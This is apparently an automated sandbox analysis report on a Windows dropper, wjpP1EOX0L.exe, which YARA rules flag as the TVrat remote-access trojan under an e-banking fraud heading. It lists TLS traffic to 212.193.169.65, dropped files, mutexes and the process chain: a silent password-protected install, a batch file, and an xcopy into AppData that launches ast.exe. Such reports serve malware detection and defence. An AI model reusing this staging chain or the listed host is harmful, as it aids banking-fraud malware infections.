                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50154
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50157
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50160
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50163 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50163
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50166
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50169
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50160 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50172
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49825 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49836 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49844 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49852 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49860 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49868 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49884 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49897 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49905 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49913 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49913 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49921 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49940 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49948 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49956 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49964 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49972 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49980 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:49989 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50001 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50007 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50018 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50027 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50038 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50046 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50054 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50062 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50071 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50081 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50089 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50098 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50103 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50106 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50109 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50112 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50115 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50118 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50121 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50124 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50127 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50130 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50133 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50136 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50139 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50142 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50145 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50148 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50151 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50154 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50157 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50160 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50163 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50166 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50169 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50172 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50175 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50181 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50184 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50187 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 212.193.169.65:443 -> 192.168.2.4:50190 version: TLS 1.2
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED

                          E-Banking Fraud

                          barindex
                          Yara detected TVrat
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8D8010 CryptAcquireContextA,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,10_2_6B8D8010
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8FFEF010_2_6B8FFEF0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8F6EF010_2_6B8F6EF0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8D2D2010_2_6B8D2D20
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8D738010_2_6B8D7380
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8E8A8010_2_6B8E8A80
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8E3A1010_2_6B8E3A10
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B910A4010_2_6B910A40
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8DF95010_2_6B8DF950
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8F117010_2_6B8F1170
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B92005010_2_6B920050
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8FA79010_2_6B8FA790
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8D773010_2_6B8D7730
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B906F4010_2_6B906F40
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8DEEA010_2_6B8DEEA0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B9075D010_2_6B9075D0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8FDCD010_2_6B8FDCD0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B92BCF010_2_6B92BCF0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: 10_2_6B8F0C1010_2_6B8F0C10
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: String function: 6B91ED00 appears 32 times
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: String function: 6B8F48E0 appears 32 times
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: String function: 6B9006B0 appears 180 times
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeCode function: String function: 6B9005D0 appears 213 times
                          Source: wjpP1EOX0L.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: wjpP1EOX0L.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: wjpP1EOX0L.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                          Source: wjpP1EOX0L.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1711597591.0000000002576000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs wjpP1EOX0L.exe
                          Source: wjpP1EOX0L.exe, 00000000.00000003.1711898611.000000007FE32000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs wjpP1EOX0L.exe
                          Source: wjpP1EOX0L.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                          Source: classification engineClassification label: mal68.troj.evad.winEXE@15/60@11/3
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkslNBC07263F-BB1A-48FB-BEDA-5E5CFBC91BB8
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\NULL
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\3 @
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\npr01lnkwrNBC07263F-BB1A-48FB-BEDA-5E5CFBC91BB8
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\U SVW3 E E E
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeMutant created: \Sessions\1\BaseNamedObjects\Global\02CC837A-11F4-4C58-AE40-A04E18FF470Dv6
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeFile created: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmpJump to behavior
                          Source: Yara matchFile source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat""
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Roaming\im\ast.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515561048.0000000061E8B000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                          Source: wjpP1EOX0L.exeString found in binary or memory: /LOADINF="filename"
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeFile read: C:\Users\user\Desktop\wjpP1EOX0L.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\wjpP1EOX0L.exe "C:\Users\user\Desktop\wjpP1EOX0L.exe"
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp "C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp" /SL5="$20476,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe"
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess created: C:\Users\user\Desktop\wjpP1EOX0L.exe "C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp "C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp" /SL5="$2047E,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat""
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\im\ast.exe "C:\Users\user\AppData\Roaming\im\ast.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\im\ast.exe "C:\Users\user\AppData\Roaming\im\ast.exe"
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp "C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp" /SL5="$20476,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpProcess created: C:\Users\user\Desktop\wjpP1EOX0L.exe "C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1mJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeProcess created: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp "C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp" /SL5="$2047E,6422358,121344,C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1mJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\mo6x\xuwl3fl.bat""Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\im\ast.exe "C:\Users\user\AppData\Roaming\im\ast.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\wjpP1EOX0L.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: msimg32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: shfolder.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmpSection loaded: ncrypt.dllJump to behavior
